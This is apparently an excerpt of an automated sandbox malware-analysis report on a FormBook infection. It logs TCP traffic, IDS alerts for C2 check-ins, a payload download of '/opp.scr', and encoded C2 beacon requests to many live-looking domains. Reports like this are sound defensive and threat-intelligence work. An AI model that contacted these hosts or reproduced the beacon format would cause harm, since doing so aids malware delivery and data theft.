            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49164 -> 66.96.161.166:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49169 -> 94.23.162.163:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49173 -> 194.9.94.86:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49177 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49181 -> 198.12.241.35:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49185 -> 183.111.183.31:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49189 -> 67.223.117.189:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49193 -> 154.41.250.58:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49197 -> 183.111.183.31:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49201 -> 208.91.197.13:80
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeDNS query: www.99b6q.xyz
            Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7BC00D90-3286-43A4-8263-7BB80B0A8239}.tmp
            Source: global trafficHTTP traffic detected: GET /opp.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.terelprime.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2019/sqlite-dll-win32-x86-3290000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.kinkynerdspro.blogUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.xn--matfrmn-jxa4m.seUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.primeplay88.orgUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.aceautocorp.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mrart.co.krUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.touchclean.topUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ibistradingco.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jnkinteractive.co.krUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.riveramayahousing.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
